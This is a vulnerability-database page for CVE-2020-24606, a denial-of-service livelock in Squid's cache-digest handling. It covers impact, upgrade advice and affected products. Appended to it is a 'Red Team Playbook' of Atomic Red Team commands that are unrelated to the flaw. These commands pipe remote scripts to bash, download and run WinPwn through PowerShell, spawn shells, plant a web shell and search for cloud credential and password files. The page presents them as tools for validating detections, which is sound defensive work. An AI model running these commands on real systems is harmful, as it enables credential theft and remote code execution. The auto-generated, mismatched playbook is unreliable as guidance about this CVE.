CVE-2020-24606
Overview
This vulnerability is a Denial of Service (DoS) condition caused by a livelock in the peerDigestHandleReply() function within the peer_digest.cc component of Squid. It occurs specifically when the cache_peer directive is used alongside the cache digests feature, where mishandling of an EOF condition during processing of a crafted Cache Digest response leads to excessive CPU consumption. The flaw affects Squid versions prior to 4.13 and 5.x versions before 5.0.4.
Vulnerability Description
Squid before 4.13 and 5.x before 5.0.4 allows a trusted peer to perform Denial of Service by consuming all available CPU cycles during handling of a crafted Cache Digest response message. This only occurs when cache_peer is used with the cache digests feature. The problem exists because peerDigestHandleReply() livelocking in peer_digest.cc mishandles EOF.
Impact
An attacker with control over a trusted peer can induce a livelock condition that exhausts CPU resources on the target Squid server, resulting in denial of service. No authentication or user interaction is required beyond trusted peer status (CVSS vector AV:N/AC:L/PR:N/UI:N). This can disrupt caching services and degrade network performance, potentially impacting availability for legitimate users and dependent systems.
Solution
Upgrade Squid to version 4.13 or later, or 5.0.4 or later, as recommended in vendor advisories such as Debian DSA-4751 and Ubuntu USN-4477-1. The official Squid patch SQUID-2020_9.patch addresses the issue. Detailed patch instructions and updates are available at https://www.debian.org/security/2020/dsa-4751 and https://usn.ubuntu.com/4477-1/. Applying these updates mitigates the livelock vulnerability in peer_digest.cc.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question arises from a flaw in the handling of Cache Digest response messages within specific versions of the Squid caching proxy software. This issue is primarily linked to the peerDigestHandleReply() function, which is responsible for processing responses from trusted peers when the cache peer feature is utilized alongside cache digests. The flaw manifests as a livelock condition, where the system becomes unresponsive due to excessive CPU cycle consumption. This occurs when the function mishandles an End-of-File (EOF) condition, leading to an infinite loop that prevents the normal processing of requests. As a result, the affected Squid versions prior to 4.13 and 5.x before 5.0.4 are particularly vulnerable when configured to use cache digests with trusted peers.
Exploitation of this vulnerability can occur through crafted Cache Digest messages sent by a malicious or compromised trusted peer. An attacker could leverage this flaw to send specially designed responses that trigger the livelock condition, effectively consuming all available CPU resources on the affected system. This denial-of-service scenario can be executed remotely, making it particularly concerning for environments that rely on Squid for caching and proxying web traffic. Attackers may target organizations that utilize Squid as part of their infrastructure to disrupt services, degrade performance, or even distract from other malicious activities occurring simultaneously.
The real-world impact of this vulnerability can be significant, especially for businesses that rely heavily on web caching for performance and availability. A successful denial-of-service attack could lead to service outages, resulting in lost revenue, decreased customer trust, and potential damage to brand reputation. Furthermore, the downtime associated with such an attack could necessitate costly remediation efforts, including system restarts, resource reallocations, and potential hardware upgrades to mitigate future risks. Organizations that depend on continuous access to web resources may find themselves particularly vulnerable, as prolonged outages can disrupt operations and hinder productivity.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, it is crucial to monitor system logs for unusual patterns that may indicate attempts to exploit the flaw, such as repeated high CPU usage or abnormal traffic patterns from trusted peers. Regularly updating the Squid software to the latest stable versions is essential, as patches addressing this vulnerability have been released. Additionally, organizations should consider employing intrusion detection systems (IDS) that can identify and alert on anomalous behavior associated with cache digest processing. Implementing strict access controls on trusted peers can also reduce the risk of exploitation by limiting the number of entities that can send Cache Digest messages.
In conclusion, the vulnerability in the Squid caching proxy presents a serious risk to organizations that utilize this software for web caching and proxying. By understanding the technical details, potential attack vectors, and real-world implications, organizations can better prepare themselves against this threat. Proactive detection and mitigation strategies, including software updates and monitoring, are essential to safeguarding against the denial-of-service risks posed by this flaw. As cyber threats continue to evolve, maintaining vigilance and adapting security practices will be crucial in protecting critical infrastructure from exploitation.
Affected Products (12)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Squid-Cache | Squid | All |
cpe:2.3:a:squid-cache:squid:*:*:*:*:*:*:*:*
|
|
|
Squid-Cache | Squid | All |
cpe:2.3:a:squid-cache:squid:*:*:*:*:*:*:*:*
|
|
|
Canonical | Ubuntu Linux | 16.04 |
cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*
|
|
|
Canonical | Ubuntu Linux | 18.04 |
cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*
|
|
|
Canonical | Ubuntu Linux | 20.04 |
cpe:2.3:o:canonical:ubuntu_linux:20.04:*:*:*:lts:*:*:*
|
|
|
Debian | Debian Linux | 9.0 |
cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*
|
|
|
Debian | Debian Linux | 10.0 |
cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 31 |
cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 32 |
cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 33 |
cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*
|
|
|
Opensuse | Leap | 15.1 |
cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*
|
|
|
Opensuse | Leap | 15.2 |
cpe:2.3:o:opensuse:leap:15.2:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.